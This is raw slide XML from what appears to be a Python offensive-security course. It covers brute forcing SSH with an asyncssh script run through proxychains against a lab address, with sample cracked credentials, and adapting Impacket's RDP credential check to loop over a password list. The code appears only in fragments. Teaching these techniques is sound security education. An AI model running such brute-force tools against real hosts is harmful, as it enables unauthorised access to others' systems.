              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dest</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"port"</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help</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"Port to use when connecting to SSH"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default</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22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ...</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targets = ipaddress.IPv4Network(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args.targets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).hosts()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    port = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args.port</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users_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open</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args.users_file</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pwds_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open</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args.pwds_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>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asyncio.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(main(targets, port, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>users_file</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pwds_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95448399-A23E-47A4-AE23-EF19F01E3D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4140074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807219" y="1285932"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Brute Forcing Network Services (cont.) : Brute Forcing SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF84A869-6084-4BEB-AD8E-3FB84C5E2982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147962" y="1888756"/>
            <a:ext cx="10205840"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If we run the script, we against the target, we should get some credentials back</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F97888F-D247-4368-90BF-10908575C70F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509337" y="2702742"/>
            <a:ext cx="11562347" cy="830997"/>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600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proxychains python3.10 asyncssh_bruteforce_ssh.py -U users.txt -P passwords.txt 172.16.238.11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Credentials found: 172.16.238.11 root s3cr3t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Credentials found: 172.16.238.11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>khalid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1337khalid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0976C4FE-1BAA-4913-9CBC-9BA0A38B17C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147962" y="3873967"/>
            <a:ext cx="10205840"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In case of issues, try to lower the concurrent connections made through the Semaphore variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>sem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E212324-E2C4-43AA-AC39-F4629D365CEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42718950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771125" y="1024404"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Brute Forcing Network Services (cont.) : Playing with Impacket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF84A869-6084-4BEB-AD8E-3FB84C5E2982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831130" y="1772450"/>
            <a:ext cx="3748891" cy="4093428"/>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“Impacket is a collection of Python classes for working with network protocols.” - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Impacket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Impacket provides low-level programming access to network packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Impacket also provides examples on what can be done with it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In this section, we will utilize Impacket to brute force RDP servers as an example.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, application, table&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD6B1F0B-1493-42A5-8464-EDE2DC2231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241" y="1463842"/>
            <a:ext cx="7872663" cy="5394157"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A23BF10C-FB11-4C8A-AB2C-1810B451A81B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28275578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Brute Forcing Network Services (cont.) : Brute forcing RDP with Impacket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3477875"/>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RDP is a complicated protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Impacket has provided a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to check whether a specific set of credentials are valid or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We will modify the script to suit our needs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We need to brute force with a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>List of passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We can grab the script from Impacket and start modifying it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C00C415-B555-439B-B4BA-EC05DAA7C861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11877893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Brute Forcing Network Services (cont.) : Brute forcing RDP with Impacket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A45D39-AEE3-4FC1-A10B-483F39832A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139941" y="1912818"/>
            <a:ext cx="10370118" cy="707886"/>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t>The logic here is to loop through all passwords and use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>check_rdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> provided by Impacket to check credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D951C7-864B-453A-8C71-0A03CB14D4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608974" y="2666647"/>
            <a:ext cx="9372047" cy="1754326"/>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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open</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password_file</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"rt"</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as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> f:</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a:t>
            </a:r>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f:</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pwd</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pwd.strip</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logging.debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Trying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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check_rdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(address, username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>opts.hashes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logging.info(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
